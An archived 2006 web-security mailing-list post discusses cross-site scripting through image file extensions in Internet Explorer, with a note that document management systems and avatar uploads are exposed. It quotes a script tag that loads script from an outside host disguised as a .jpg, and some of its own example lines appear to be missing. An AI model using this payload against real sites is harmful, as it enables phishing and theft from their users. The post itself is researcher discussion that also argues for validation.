[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

Evans, Arian Arian.Evans at fishnetsecurity.com
Mon Jun 26 14:09:19 EDT 2006

> -----Original Message-----
> From: RSnake [mailto:rsnake at shocking.com] 
> Sent: Sunday, June 25, 2006 11:49 PM

[...]lots of good stuff removed

>  But to answer your question
> <script src="http://ha.ckers.org/xss.jpg"></script>
> will continue to work

There's a couple of ways you can do this, as I'm sure
you are aware, but I haven't seen this well documented
in the past. This, for example, is all you need in IE:


Anywhere you can embed/reference an image, IE will execute
script types it understands for image (any) extensions it has
native shell extension handling configured to use itself for.

If you can get the image to 'render' inline of an existing script,
you may be able to get away with a simple directive as such:


It's quite fun, and most web-based DMSes are vulnerable to
this type of abuse, say *nothing* of the zillions of sites
that allow custom avatars.

This is definitely something the browser could kabosh
short-term, though long term you'd think DMS systems would
want to validate all user supplied data, including the
/documents/ themselves.



The Web Security Mailing List: 

The Web Security Mailing List Archives: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

More information about the websecurity mailing list